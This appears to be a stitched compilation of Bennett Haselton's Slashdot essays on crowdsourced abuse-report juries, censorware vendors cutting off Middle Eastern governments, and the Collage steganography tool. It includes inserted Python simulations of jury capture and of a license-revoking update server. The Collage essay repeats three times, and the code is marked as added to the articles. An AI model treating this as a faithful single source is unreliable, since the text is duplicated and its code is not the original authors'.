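          expected_colluder_seats(POOL, JURY, MOB))
    print("P[mob gets >= 1 seat]   :",
          capture_probability(POOL, JURY, MOB, 1))
    print("P[mob gets a majority]  :",
          capture_probability(POOL, JURY, MOB, MAJORITY))

    # Defender's margin: how many colluding accounts the pool can absorb
    # before a majority capture becomes a one-in-a-million event.
    limit = max_tolerable_colluders(POOL, JURY, MAJORITY, 1e-6)
    print("bloc size at 1e-6 risk  :", limit, f"({limit / POOL:.1%} of pool)")

    # Peer review from the follow-up: 20% dishonest voters, panel of 20.
    # The panel errs only if dishonest voters hold 11 or more seats.
    print("P[panel of 20 is wrong] :",
          capture_probability(POOL, 20, POOL // 5, 11))
```

Raising the removal threshold above a simple majority, as the article suggests for a skewed reviewer population, is a change to `seats_needed`; jurors who never respond shrink the effective `jury`.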
Jurors could in fact be given three voting choices:
- "This group really is abusive" (i.e. the abuse reports were legitimate), or;
- "This group does not technically violate the Terms of Service, but the users who filed abuse reports were probably making an honest mistake" (perhaps a common choice for groups that support controversial causes, or that publish information about semi-private individuals); or
- "This group does not violate the TOS, and the abuse reports were bogus to begin with" (i.e. almost no reasonable person could have believed that the group really did violate the TOS, and the abuse reports were probably part of an organized campaign to get the group removed).
This strongly discourages users from organizing mob efforts against legitimate groups; if most of the jury ends up voting for the third choice, "This is an obviously legitimate group and the complaints were just an organized vigilante campaign", then the users who filed the complaints could have their own accounts penalized.
What I like about this algorithm is that the sizes and thresholds can be tweaked according to what you discover about the habits of the Facebook content reviewers. Suppose most volunteer reviewers turn out to be deadbeats who don't respond to "jury duty" when they're actually called upon to vote in an abuse report case. Fine — just increase the size of the jury, until the average number of users in a randomly convened jury who do respond, is large enough to be statistically significant. Or, suppose it turns out that people who sign up to review content to be deleted, are a more prudish bunch than average, and their votes tend to skew towards "delete it now!" in a way that is not representative of the general Facebook community. Fine — just raise the threshold for the percentage of "Yes" votes required to get content deleted. All that's required for the algorithm to work, is that content which clearly does violate the Terms of Service, gets more "Yes" votes on average than content that doesn't. Then make the jury size large enough that the voting results are statistically significant, so you can tell which side of the threshold you're on.
Another beneficial feature of the algorithm is that it's scalable — there's no bottleneck of overworked reviewers at Facebook headquarters who have to review every decision. (They should probably review a random subset of the decisions to make sure the "juries" are getting what seems to be the right answer, but they don't have to check every one.) If Facebook doubles in size — and the amount of "abusive content" and the number of abuse reports doubles along with it — then as long as the pool of volunteer reviewers also doubles, each reviewer has no greater workload than they had before. But the workload of the abuse department at Facebook doesn't double.
Now, this algorithm ducks the question of how to handle "borderline" content. If a student creates a Facebook group called "MR. LANGAN IS A BUTT BRAIN," is that "harassment" or not? I would say no, but I'm not confident that a randomly selected pool of reviewers would agree. However, the point of this algorithm is to make sure that if content is posted on Facebook that almost nobody would reasonably agree is a violation of their Terms of Service, then a group of vigilantes can't get it removed by filing a torrent of abuse reports.
Also, this proposal can't do much about Facebook's Terms of Service being prudish to begin with. A Frenchman recently had his account suspended because he used a 19th-century oil painting of an artistic nude as his profile picture. Well, Facebook's TOS prohibits nudity -- not just sexual nudity, but all nudity, period. Even under my proposed algorithm, jurors would presumably have to be honest and vote that the painting did in fact violate Facebook's TOS, unless or until Facebook changes the rules. (For that matter, maybe this wasn't a case of prudishness anyway. I mean, we know it's "artistic" because it's more than 100 years old and it was painted in oils, right? Yeah, well check out the painting that the guy used as his profile picture. It presumably didn't help that the painting is so good that the Facebook censors probably thought it was a photograph.)
But notwithstanding these problems, this algorithm was the best trade-off I could come up with in terms of scalability and fairness. So here's the contest: Send me your best alternative, or best suggested improvement, or best fatal flaw in this proposal (even if you don't come up with something better, the discovery of a fatal flaw is still valuable) for a chance to win (a portion of) the $100 -- or, you can designate a charity to be the recipient of your winnings. Send your ideas to bennett at peacefire dot org and put "reporting" in the subject line. I reserve the right to split the prize between multiple winners, or to pay out more than the original $100 (or give winners the right to designate charitable donations totalling more than $100) if enough good points come in (or to pay out less than $100 if there's a real dearth of valid points, but there are enough brainiacs reading this that I think that's unlikely). In order for the contest not to detract from the discussion taking place in the comment threads, if more than one reader submits essentially the same idea, I'll give the credit to the first submitter -- so as you're sending me your idea, you can feel free to share it in the comment threads as well without worrying about someone re-submitting it and stealing a portion of your winnings. (If your submission is, "Bennett, your articles would be much shorter if you just state your conclusion, instead of also including a supporting argument and addressing possible objections", feel free to submit that just in the comment threads.)
In The Net Delusion, Morozov concludes his section on phony abuse reports by saying, "Good judgment, as it turns out, cannot be crowdsourced, if only because special interests always steer the process to suit their own objectives." I think he's right about the problems, but I disagree that they're unsolvable. I think my algorithm does in fact prevent "special interests" from "steering the process", but I'll pay to be convinced that I'm wrong. Today I'm just choosing the "winners" of the contest myself; maybe someday I'll crowdsource the decision by letting a randomly selected subset of users vote on the merits of each proposal... but I'm sure some of you are dying to tell me why that's a bad idea.
-
Censorware Vendors Can Stop Mid-East Dealings
Slashdot regular Bennett Haselton is back with a story about Internet censorship in the Middle East. Several blocking software companies claimed that they had no control over how various Middle Eastern governments used their software. Bennett says it's time to put this patently false claim to rest. American censorware companies could easily cut off Middle Eastern governments from using their software, and thus make their existing filtering systems far less effective; they just refuse to do it. Hit the link below to see what he has to say, and make up your own mind.The Wall Street Journal published an article Monday listing the Western-made Internet censoring programs used by several Middle Eastern governments, in countries that filter what their citizens can access on the Web. Like a similar 2011 report from the OpenNet Initiative, hopefully this listing will shine a spotlight on the problem, and make it easier for human rights groups to call for these companies to stop aiding censorious governments.
However, I wish that the article had quoted someone giving a rebuttal to the several companies which claimed, "Once the customer buys the product, we have no control over it," as stated variously by Netsweeper, Blue Coat, and McAfee (which makes Smartfilter). For a product that relies on continuous updates provided by the software company, this claim, of course, is nonsense. Unfortunately, the claim seems to go unchallenged so often that there's a risk that it will start to affect policy -- people may believe that we can't regulate how American censorware is used by repressive countries, so we shouldn't even try.
Some background: When a customer buys a standard network filtering program like Websense, SmartFilter, or Blue Coat, the product comes with a built-in list of websites to be blocked by the software. (The customer can select or de-select categories of sites to be blocked, like "pornography" or "gambling".) The purchase of the software typically comes with a year or two of free updates to the blocked-site list. The software vendor employs a combination of human reviewers and (more often) automated crawlers to scour the Web looking for new sites that fall into their categories, and adds these sites to their database. Customers who are within their subscription period can download periodic updates to this blocked-site list. After a customer's initial free subscription period runs out, they can opt to continue purchasing updates to the database. If they don't, then the product will continue to work, but the blocked-site list will be frozen (except for any new sites that the customer finds on their own and adds manually to their own blocked-site list).
Once the blocked-site list is frozen, the filtering product becomes ineffective against any user making a serious effort to get around it. This is because there are many mailing lists like mine that mail out new proxy sites every week (a proxy site is a site which contains a form that allows the user to access third-party Web sites indirectly, usually to circumvent Internet blocking). And as long as the user can access at least one unblocked proxy site, they can access any other blocked site by going through the proxy. So when a censorious regime stops updating their blocked-site list, the product becomes ineffective almost immediately. (For that, I suppose, the blocking companies should be grateful to us proxy site makers, since we make it necessary for their customers to keep renewing their blocked-site subscriptions year after year.)
So, even if one were to accept the (highly dubious) claim that the software vendors didn't realize what was going on when a foreign government approached them to buy their software, once they realize that their software is being used to violate the rights of the country's people, they can easily stop providing updates to that customer. This can be done by either (a) blocking the IP addresses that the customer uses to download the updates, or (b) blocking any further updates using that customer's license key. (Each installation of a blocking program like Websense comes with a license key unique to that customer, and the program has to submit the license key to the download server in order to download the latest update to the blocked-site list. If the customer's subscription runs out or gets cancelled, no more updates.)
This is roughly the situation that exists in Iran. The Iranian government claims to use McAfee's Smartfilter to filter Internet access for their citizens, despite McAfee's claim that they don't sell to Iran because of the embargo. But the evidence suggests that while Iran may have once acquired Smartfilter along with a copy of their filter list that was current at the time, they're not getting regular updates to the blocked-site list. From corresponding with Iranians and testing the filter through a server located inside Iran, I've found that most of the proxy sites we mail out never get blocked at all in Iran, even as they eventually get blocked in countries like Bahrain and Kuwait that are using Smartfilter with a subscription to the blocked-site database. The proxy sites we mail out that do get blocked in Iran are usually blocked a few days later than they are in Bahrain and Kuwait. This suggests that the Iranian censors are finding and blocking new proxy sites by ad hoc methods, and that they're not as effective at it as American censorware companies. So the Iranian situation proves two points: that Western blocking companies really can prevent a foreign government from using their products (well, duh), and that this restriction actually works, in the sense of making the country's filter less effective.
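The cut-off described above, modelled as an added example (not code from the article or from any vendor): a hypothetical update server that refuses downloads by (a) source network or (b) license key, and a filter installation whose vendor list freezes once it is refused. All class names, license keys, addresses and domains are constructed for illustration.

```python
import ipaddress
from dataclasses import dataclass, field


@dataclass
class UpdateServer:
    """Vendor-side download server for the blocked-site list (hypothetical model)."""
    entries: list = field(default_factory=list)      # append-only (version, domain) pairs
    active_keys: set = field(default_factory=set)    # license keys with a live subscription
    denied_nets: list = field(default_factory=list)  # networks refused regardless of key

    def publish(self, domain):
        """Vendor adds a newly categorised site; returns the new list version."""
        version = len(self.entries) + 1
        self.entries.append((version, domain))
        return version

    def revoke(self, key):
        """Option (b): cancel the customer's license key."""
        self.active_keys.discard(key)

    def deny_network(self, cidr):
        """Option (a): refuse the addresses the customer downloads from."""
        self.denied_nets.append(ipaddress.ip_network(cidr))

    def fetch(self, key, src_ip, since):
        """Return (status, entries newer than `since`) for one download request."""
        addr = ipaddress.ip_address(src_ip)
        if any(addr in net for net in self.denied_nets):
            return "denied-ip", []
        if key not in self.active_keys:
            return "denied-license", []
        return "ok", [(v, d) for v, d in self.entries if v > since]


@dataclass
class FilterInstall:
    """Customer-side filter: vendor list plus the customer's own manual additions."""
    key: str
    src_ip: str
    version: int = 0
    vendor_list: set = field(default_factory=set)
    manual_list: set = field(default_factory=set)

    def update(self, server):
        """Ask the vendor for new entries; a refused request leaves the list frozen."""
        status, new = server.fetch(self.key, self.src_ip, self.version)
        for version, domain in new:
            self.vendor_list.add(domain)
            self.version = max(self.version, version)
        return status

    def is_blocked(self, domain):
        return domain in self.vendor_list or domain in self.manual_list


def run_scenario():
    """Two customers receive week 1; one is cut off before week 2 is published."""
    server = UpdateServer()
    server.active_keys.update({"KEY-SUBSCRIBED", "KEY-CUTOFF"})  # constructed keys
    subscribed = FilterInstall("KEY-SUBSCRIBED", "198.51.100.10")
    cut_off = FilterInstall("KEY-CUTOFF", "203.0.113.25")

    server.publish("proxy-week1.example")
    subscribed.update(server)
    cut_off.update(server)

    # Vendor applies both cut-off options to the second customer.
    server.revoke("KEY-CUTOFF")
    server.deny_network("203.0.113.0/24")

    server.publish("proxy-week2.example")
    status_subscribed = subscribed.update(server)
    status_cut_off = cut_off.update(server)

    # The cut-off customer can still add sites by hand, as the article notes.
    cut_off.manual_list.add("rights-group.example")

    return {
        "status_subscribed": status_subscribed,
        "status_cut_off": status_cut_off,
        "subscribed_blocks_week2": subscribed.is_blocked("proxy-week2.example"),
        "cut_off_blocks_week1": cut_off.is_blocked("proxy-week1.example"),
        "cut_off_blocks_week2": cut_off.is_blocked("proxy-week2.example"),
        "cut_off_blocks_manual": cut_off.is_blocked("rights-group.example"),
        "cut_off_version": cut_off.version,
    }


if __name__ == "__main__":
    for name, value in run_scenario().items():
        print(f"{name}: {value}")
```

The cut-off installation keeps blocking what it already had and what its operator adds by hand, but the proxy site published after the cut-off stays reachable, which is the frozen-list effect the article attributes to Iran.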
So when a McAfee spokesman told the WSJ reporters, "You can add additional websites to the block list; obviously what an individual customer would do with a product once they acquire it is beyond our control," that's true only in the most literal sense. Yes, Bahrain can add human rights web pages to their list of sites blocked by Smartfilter, and McAfee can't stop them, but the effectiveness of this block depends on the Bahraini censors using Smartfilter to block new proxy sites as well, which McAfee continues to aid them in doing, as a matter of choice.
Websense, incidentally, announced in 2009 -- in response to an earlier ONI report describing how their software was used to censor Internet access in Yemen -- that they would stop providing censoring software to the Yemeni government. But ONI's current report claims that the Yemeni government continued to use Websense into 2011, and Websense declined to comment. Maybe the Yemeni government was using Websense with a "frozen blocked-site list" -- but the ONI report includes at least one instance where a site that was un-blocked by Websense (the opennet.net domain itself!) became un-blocked in Yemen shortly afterwards. So maybe Websense just lied about canceling the Yemenis' license.
Could some censorious country like Yemen continue using the Websense filter -- with a continuously updated blocked-site list -- even after Websense truly tried to cut them off? Possibly, but it would probably be more trouble than it's worth. Yemen would have to set up a shell company outside of their own borders, with an overseas bank account, in order to purchase the software. Then after Yemen had installed Websense on their servers, they would have to download the updates indirectly by going through an anonymizing proxy set up in some other country as well. And if Websense ever found out which of their customers was a shell company used by the Yemeni government, they could cut off that customer's license, and the Yemeni censors would have to start all over again. It's probably safe to say that most Middle Eastern countries wouldn't find this worth the trouble. (After all, Iran could do everything I've just described, but apparently they haven't; they still seem to be using Smartfilter with an outdated copy of the blocked-site list, and adding new proxy sites to their blacklist manually.)
So far, proposals to ban American censorware companies from selling to foreign governments have not gotten off the ground -- and now with several Middle Eastern countries using or looking at Netsweeper, we'd have to get Canada on board as well. But at the very least, let's start calling out censorware companies on the canard that "We just sell the software and have no way of controlling who uses it." The companies know that foreign governments are using it to censor their own people, and they can cut them off as customers any time they want to; they just don't.
-
Collage, and the Challenge of "Deniability"
Slashdot regular Bennett Haselton has written a piece on a new program called Collage that can circumvent censorship by embedding messages in user-generated content on sites like Flickr. The program demonstrates that a long-standing theoretical concept can be reduced to practice, but Bennett wonders if anybody would actually need it, as long as they can exchange encrypted messages over Gmail and AIM. He begins "In a presentation delivered at USENIX, Georgia Tech grad student Sam Burnett and his colleagues described how their new program, "Collage," could circumvent Internet censorship by embedding messages in user-generated content on sites like Flickr. The short version is that a publisher uses the Collage system to break a message into pieces that are small enough to embed into a photograph using standard steganography, the photos are published according to some protocol (e.g. "all photos in the photostream of user xyz" or "all photos tagged with the 'xyz' tag"), and receivers who know the protocol for identifying the photos can retrieve them and decode the message. According to the authors' paper, the system is general enough that it could be adapted to almost any site where user-generated content is published. (All of this can be done by hand using existing tools, but Collage automates the process to hide the individual steps from the user.)"
From this short description, you can see the two salient facts about Collage: (1) it's robust, in the sense that in order to shut it down completely, the censor would have to block every site containing user-generated content; and (2) it's efficient only for small text messages (which is what the authors used to test it), and not for high-bandwidth communications such as video. The authors have also highlighted the claim that Collage is (3) deniable, in the sense that in using it, you won't attract the attention of the censors for browsing "innocent" sites like Flickr.
On this point, I'm not so sure; I think it's highly dependent on the kinds of publication system that the sender and the recipient agree on. For example, if the sender publishes their messages in photos all in one user's photostream, and that photostream is used primarily by recipients in censored countries to receive encoded messages, and if virtually nobody ever visits that photostream for any other reason, then if the censor ever finds out about that photostream, they could flag any user who ever visits it. It doesn't matter if the "site" as a whole is "innocent", if that one user's photostream is not.
But there's a more fundamental issue: Currently, in all censored countries, there is at least one way to receive prohibited text messages more efficiently (and with greater deniability) than with Collage. So Collage may work perfectly, but even when it gets released, I'd be very surprised to see large numbers of people using it unless all the simpler alternatives get blocked.
Most tools that people use to circumvent Internet censorship are not "deniable" in the sense described above. If you visit a proxy site like VTunnel, any censor who is monitoring your Internet connection can see that you connected to a known proxy site. If you connect to the proxy site using "https://" instead of "http://", then a censor eavesdropping on your connection won't be able to tell what you looked at through the proxy site (unless they confiscate your computer and look through your browser history), but they'll still be able to tell that you visited a proxy site. Similarly, if you use a tool like UltraSurf or Tor, those tools can circumvent the censor's filters by re-routing your Internet connection through a server outside the censored country -- but a censor monitoring your traffic can still see that you connected to an UltraSurf or Tor server outside the country, even if they can't tell what Web sites you were visiting.
But if all you want is to receive short text messages, then there are many options that are completely "deniable." The simplest is probably to use Gmail and to choose the option to always read messages over https://. (If you sign in to Gmail, under "Settings" you can choose between "Always use https" and "Don't always use https".) If you read your inbox contents using https, then a censor eavesdropping on your connection can't see anything at all -- not the contents of messages that people send you, not the email addresses of people who are writing to you, not even the username that you use to sign in to read your Gmail messages. This gives you more or less perfect deniability. As long as many Gmail users are using Gmail over https://, then doing this by itself would not attract undue attention from censors monitoring your Internet traffic. Using Gmail, you could also exchange higher-bandwidth content like images and video (up to Gmail's attachment size limit, currently 25 megabytes), something not possible with Collage.
Of course, if you remember the case in which Yahoo turned over information about one of its Chinese account-holders to the Chinese government (who subsequently arrested the user and sentenced them to 10 years in prison), you may be wary of trusting any Western corporation with your privacy. But in this case, you wouldn't have to. Because even if the Chinese government found out that some Gmail users were using Gmail to receive anti-government messages from the U.S., the censors wouldn't be able to eavesdrop on https-protected connections to find out which users were receiving the messages or what they said, so there would be no information for them to demand that Google turn over to them.
Or if you want to exchange encrypted text messages in real time, you can use any instant messaging client that supports encryption. Whether or not this is "deniable", in the sense of not attracting undue attention for "suspicious activity", depends on what proportion of other users are using the chat program in encrypted mode as well. The current version of AOL Instant Messenger, for example, apparently encrypts all instant messages by default. (Although you should take care to understand exactly what is "encrypted" when using an instant messaging client. In my experiments, when using AOL Instant Messenger, the contents of messages were encrypted, but the specific screen names that you're sending messages to and receiving messages from were not. In other words, a censor eavesdropping on your traffic can see which screen names you exchanged messages with, but not the message contents. So if there were an AOL user account in a non-censored country that was a dummy account used primarily for passing banned information to users in censored countries, then if the censors ever found out about that account, they could flag and investigate any user in their country who exchanged messages with that screen name.)
The bottom line is that as long as at least one of these alternatives remains unblocked in your country, they would serve as an easier way to achieve the same goals that Collage achieves. They're generally faster, more convenient, and most of the time, more "deniable", in the sense that the traffic they generate won't look as suspicious as, say, browsing a Flickr feed that later becomes widely known as a source of banned encoded messages. Collage does demonstrate that an interesting idea can be reduced to practice, and is robust in the sense that the general scheme cannot be blocked unless a regime blocks access to every site hosting user-submitted content. But there doesn't seem to be a compelling reason to use it unless and until all of the simpler methods get blocked.
I write all of this as someone who also wrote a program a few years ago that was meant to serve as a more robust back-up, in case a more popular method of circumventing censorship ever got shut down by the censors. In my case, I thought that most censoring regimes would start blocking all popular Web proxy sites, so I wrote an install script called "Circumventor" that would let you set up a Web server and James Marshall's CGIProxy script on your home computer, turning it into a mini-Web-proxy site. I assumed that eventually, most people in censored countries would have to rely on someone in a non-censored country to set up a private Web proxy like this and e-mail them the URL, once China and Iran got their act together and started blocking most publicly known Web proxy sites. But that never happened, partly because Web proxy sites are now springing up faster than most censors' databases can keep up with. So the web proxy install script fell by the wayside -- but that's good news, because it means that nobody really needed it, since the simpler, more straightforward methods continued to work. Why pester your cousin in the U.S. to set up a Web proxy for you, when most Web proxies you can find in Google are not even blocked yet?
And so it goes for Collage. It sounds like a perfectly fine idea, and it will be great news all around if nobody ever actually has to use it, because the censors never get around to blocking all of the simpler alternatives.
-
Collage, and the Challenge of "Deniability"
Slashdot regular Bennett Haselton has written a piece on a new program called Collage that can circumvent censorship by embedding messages in user-generated content on sites like Flickr. The program demonstrates that a long-standing theoretical concept can be reduced to practice but Bennett wonders if anybody would actually need it, as long as they can exchange encrypted messages over Gmail and AIM. He begins "In a presentation delivered at USENIX, Georgia Tech grad student Sam Burnett and his colleagues described how their new program, "Collage," could circumvent Internet censorship by embedding messages in user-generated content on sites like Flickr. The short version is that a publisher uses the Collage system to break a message into pieces that are small enough to embed into a photograph using standard steganography, the photos are published according to some protocol (e.g. "all photos in the photostream of user xyz" or "all photos tagged with the 'xyz' tag"), and receivers who know the protocol for identifying the photos, can retrieve them and decode the message. According to the authors' paper, the system is general enough that it could be adapted to almost any site where user-generated content is published. (All of this can be done by hand using existing tools, but Collage automates the process to hide the individual steps from the user.)" From this short description, you can see the two salient facts about Collage: (1) it's robust, in the sense that in order to shut it down completely, the censor would have to block every site containing user-generated content; and (2) it's efficient only for small text messages (which is what the authors used to test it), and not for high-bandwidth communications such as video. The authors have also highlighted the claim that Collage is (3) deniable, in the sense that in using it, you won't attract the attention of the censors for browsing "innocent" sites like Flickr. 
On this point, I'm not so sure; I think it's highly dependent on the kinds of publication system that the sender and the recipient agree on. For example, if the sender publishes their messages in photos all in one user's photostream, and that photostream is used primarily by recipients in censored countries to receive encoded messages, and if virtually nobody ever visits that photostream for any other reason, then if the censor ever finds out about that photostream, they could flag any user who ever visits it. It doesn't matter if the "site" as a whole is "innocent", if that one user's photostream is not.
But there's a more fundamental issue: Currently, in all censored countries, there is at least one way to receive prohibited text messages more efficiently (and with greater deniability) than with Collage. So Collage may work perfectly, but even when it gets released, I'd be very surprised to see large numbers of people using it unless all the simpler alternatives get blocked.
Most tools that people use to circumvent Internet censorship, are not "deniable" in the sense described above. If you visit a proxy site like VTunnel, any censor who is monitoring your Internet connection can see that you connected to a known proxy site. If you connect to the proxy site using "https://" instead of "http://", then a censor eavesdropping on your connection, won't be able to tell what you looked at through the proxy site (unless they confiscate your computer and look through your browser history), but they'll still be able to tell that you visited a proxy site. Similarly, if you use a tool like UltraSurf or Tor, those tools can circumvent the censor's filters by re-routing your Internet connection through a server outside the censored country -- but a censor monitoring your traffic, can still see that you connected to an UltraSurf or Tor server outside the country, even if they can't tell what Web sites you were visiting.
But if all you want is to receive short text messages, then there are many options that are completely "deniable." The simplest is probably to use Gmail and to choose the option to always read messages over https://. (If you sign in to Gmail, under "Settings" you can choose between "Always use https" and "Don't always use https".) If you read your inbox contents using https, then a censor eavesdropping on your connection can't see anything at all -- not the contents of messages that people send you, not the email addresses of people who are writing to you, not even the username that you use to sign in to read your Gmail messages. This gives you more or less perfectly deniability. As long as many Gmail users are using Gmail over https://, then doing this by itself would not attract undue attention from censors monitoring your Internet traffic. Using Gmail, you could also exchange higher-bandwidth content like images and video (up to Gmail's attachment size limit, currently 25 megabytes), something not possible with Collage.
Of course, if you remember the case in which Yahoo turned over information about one of its Chinese account-holders to the Chinese government (who subsequently arrested the user and sentenced them to 10 years in prison), you may be wary of trusting any Western corporation with your privacy. But in this case, you wouldn't have to. Because even if the Chinese government found out that some Gmail users were using Gmail to receive anti-government messages from the U.S., the censors wouldn't be able to eavesdrop on https-protected connections to find out which users were receiving the messages or what they said, so there would be no information for them to demand that Google turn over to them.
Or if you want to exchange encrypted text messages in real time, you can use any instant messaging client that supports encryption. Whether or not this is "deniable", in the sense of not attracting undue attention for "suspicious activity", depends on what proportion of other users are using the chat program in encrypted mode as well. The current version of AOL Instant Messenger, for example, apparently encrypts all instant messages by default. (Although you should take care to understand exactly what is "encrypted" when using an instant messaging client. In my experiments, when using AOL Instant Messenger, the contents of messages were encrypted, but the specific screen names that you're sending and receiving messages from, are not. In other words, a censor eavesdropping on your traffic, can see which screen names you exchanged messages with, but not the message contents. So if there were an AOL user account in a non-censored country that was a dummy account used primarily for passing banned information to users in censored countries, then if the censors ever found out about that account, they could flag and investigate any user in their country who exchanged messages with that screen name.)
The bottom line is that as long as at least one of these alternatives remains unblocked in your country, they would serve as an easier way to achieve the same goals that Collage achieves. They're generally faster, more convenient, and most of the time, more "deniable", in the sense that the traffic they generate won't look as suspicious as, say, browsing a Flickr feed that later becomes widely known as source of banned encoded messages. Collage does demonstrate that an interesting idea can be reduced to practice, and is robust in the sense that the general scheme cannot be blocked unless a regime blocks access to every site hosting user-submitted content. But there doesn't seem to be a compelling reason to use it unless and until all of the simpler methods get blocked.
I write all of this as someone who also wrote a program a few years ago that was meant to serve as a more robust back-up, in case a more popular method of circumventing censorship ever got shut down by the censors. In my case, I thought that most censoring regimes would start blocking all popular Web proxy sites, so I wrote an install script called "Circumventor" that would let you set up a Web server and James Marshall's CGIProxy script on your home computer, turning it into a mini-Web-proxy site. I assumed that eventually, most people in censored countries would have to rely on someone in a non-censored country to set up a private Web proxy like this and e-mail them the URL, once China and Iran got their act together and started blocking most publicly known Web proxy sites. But that never happened, partly because Web proxy sites are now springing up faster than most censors' databases can keep up with. So the web proxy install script fell by the wayside -- but that's good news, because it means that nobody really needed it, since the simpler, more straightforward methods continued to work. Why pester your cousin in the U.S. to set up a Web proxy for you, when most Web proxies you can find in Google are not even blocked yet?
And so it goes for Collage. It sounds like a perfectly fine idea, and it will be great news all around if nobody ever actually has to use it, because the censors never get around to blocking all of the simpler alternatives. -
Collage, and the Challenge of "Deniability"
Slashdot regular Bennett Haselton has written a piece on a new program called Collage that can circumvent censorship by embedding messages in user-generated content on sites like Flickr. The program demonstrates that a long-standing theoretical concept can be reduced to practice but Bennett wonders if anybody would actually need it, as long as they can exchange encrypted messages over Gmail and AIM. He begins "In a presentation delivered at USENIX, Georgia Tech grad student Sam Burnett and his colleagues described how their new program, "Collage," could circumvent Internet censorship by embedding messages in user-generated content on sites like Flickr. The short version is that a publisher uses the Collage system to break a message into pieces that are small enough to embed into a photograph using standard steganography, the photos are published according to some protocol (e.g. "all photos in the photostream of user xyz" or "all photos tagged with the 'xyz' tag"), and receivers who know the protocol for identifying the photos, can retrieve them and decode the message. According to the authors' paper, the system is general enough that it could be adapted to almost any site where user-generated content is published. (All of this can be done by hand using existing tools, but Collage automates the process to hide the individual steps from the user.)" From this short description, you can see the two salient facts about Collage: (1) it's robust, in the sense that in order to shut it down completely, the censor would have to block every site containing user-generated content; and (2) it's efficient only for small text messages (which is what the authors used to test it), and not for high-bandwidth communications such as video. The authors have also highlighted the claim that Collage is (3) deniable, in the sense that in using it, you won't attract the attention of the censors for browsing "innocent" sites like Flickr. 
On this point, I'm not so sure; I think it's highly dependent on the kinds of publication system that the sender and the recipient agree on. For example, if the sender publishes their messages in photos all in one user's photostream, and that photostream is used primarily by recipients in censored countries to receive encoded messages, and if virtually nobody ever visits that photostream for any other reason, then if the censor ever finds out about that photostream, they could flag any user who ever visits it. It doesn't matter if the "site" as a whole is "innocent", if that one user's photostream is not.
But there's a more fundamental issue: Currently, in all censored countries, there is at least one way to receive prohibited text messages more efficiently (and with greater deniability) than with Collage. So Collage may work perfectly, but even when it gets released, I'd be very surprised to see large numbers of people using it unless all the simpler alternatives get blocked.
Most tools that people use to circumvent Internet censorship, are not "deniable" in the sense described above. If you visit a proxy site like VTunnel, any censor who is monitoring your Internet connection can see that you connected to a known proxy site. If you connect to the proxy site using "https://" instead of "http://", then a censor eavesdropping on your connection, won't be able to tell what you looked at through the proxy site (unless they confiscate your computer and look through your browser history), but they'll still be able to tell that you visited a proxy site. Similarly, if you use a tool like UltraSurf or Tor, those tools can circumvent the censor's filters by re-routing your Internet connection through a server outside the censored country -- but a censor monitoring your traffic, can still see that you connected to an UltraSurf or Tor server outside the country, even if they can't tell what Web sites you were visiting.
But if all you want is to receive short text messages, then there are many options that are completely "deniable." The simplest is probably to use Gmail and to choose the option to always read messages over https://. (If you sign in to Gmail, under "Settings" you can choose between "Always use https" and "Don't always use https".) If you read your inbox contents using https, then a censor eavesdropping on your connection can't see anything at all -- not the contents of messages that people send you, not the email addresses of people who are writing to you, not even the username that you use to sign in to read your Gmail messages. This gives you more or less perfectly deniability. As long as many Gmail users are using Gmail over https://, then doing this by itself would not attract undue attention from censors monitoring your Internet traffic. Using Gmail, you could also exchange higher-bandwidth content like images and video (up to Gmail's attachment size limit, currently 25 megabytes), something not possible with Collage.
Of course, if you remember the case in which Yahoo turned over information about one of its Chinese account-holders to the Chinese government (who subsequently arrested the user and sentenced them to 10 years in prison), you may be wary of trusting any Western corporation with your privacy. But in this case, you wouldn't have to. Because even if the Chinese government found out that some Gmail users were using Gmail to receive anti-government messages from the U.S., the censors wouldn't be able to eavesdrop on https-protected connections to find out which users were receiving the messages or what they said, so there would be no information for them to demand that Google turn over to them.
Or if you want to exchange encrypted text messages in real time, you can use any instant messaging client that supports encryption. Whether or not this is "deniable", in the sense of not attracting undue attention for "suspicious activity", depends on what proportion of other users are using the chat program in encrypted mode as well. The current version of AOL Instant Messenger, for example, apparently encrypts all instant messages by default. (Although you should take care to understand exactly what is "encrypted" when using an instant messaging client. In my experiments, when using AOL Instant Messenger, the contents of messages were encrypted, but the specific screen names that you're sending and receiving messages from, are not. In other words, a censor eavesdropping on your traffic, can see which screen names you exchanged messages with, but not the message contents. So if there were an AOL user account in a non-censored country that was a dummy account used primarily for passing banned information to users in censored countries, then if the censors ever found out about that account, they could flag and investigate any user in their country who exchanged messages with that screen name.)
The bottom line is that as long as at least one of these alternatives remains unblocked in your country, they would serve as an easier way to achieve the same goals that Collage achieves. They're generally faster, more convenient, and most of the time, more "deniable", in the sense that the traffic they generate won't look as suspicious as, say, browsing a Flickr feed that later becomes widely known as a source of banned encoded messages. Collage does demonstrate that an interesting idea can be reduced to practice, and is robust in the sense that the general scheme cannot be blocked unless a regime blocks access to every site hosting user-submitted content. But there doesn't seem to be a compelling reason to use it unless and until all of the simpler methods get blocked.
I write all of this as someone who also wrote a program a few years ago that was meant to serve as a more robust back-up, in case a more popular method of circumventing censorship ever got shut down by the censors. In my case, I thought that most censoring regimes would start blocking all popular Web proxy sites, so I wrote an install script called "Circumventor" that would let you set up a Web server and James Marshall's CGIProxy script on your home computer, turning it into a mini-Web-proxy site. I assumed that eventually, most people in censored countries would have to rely on someone in a non-censored country to set up a private Web proxy like this and e-mail them the URL, once China and Iran got their act together and started blocking most publicly known Web proxy sites. But that never happened, partly because Web proxy sites are now springing up faster than most censors' databases can keep up with. So the web proxy install script fell by the wayside -- but that's good news, because it means that nobody really needed it, since the simpler, more straightforward methods continued to work. Why pester your cousin in the U.S. to set up a Web proxy for you, when most Web proxies you can find in Google are not even blocked yet?
And so it goes for Collage. It sounds like a perfectly fine idea, and it will be great news all around if nobody ever actually has to use it, because the censors never get around to blocking all of the simpler alternatives.
-
Buried By The Brigade At Digg
Slashdot regular Bennett Haselton writes in with an essay on a subject we've dealt with internally at Slashdot for years: user abuses of social news... this time at Digg. He starts "Alternet uncovers evidence of a 'bury brigade' coordinating efforts to 'bury' left-leaning stories on Digg. Digg had previously announced that the 'bury' button will be removed from the next version of their site, to prevent these types of abuses, but that won't fix the real underlying issue — you can show mathematically that artificially promoting stories is just as harmful in the long run. Here's a simple fix that would address the real problem."
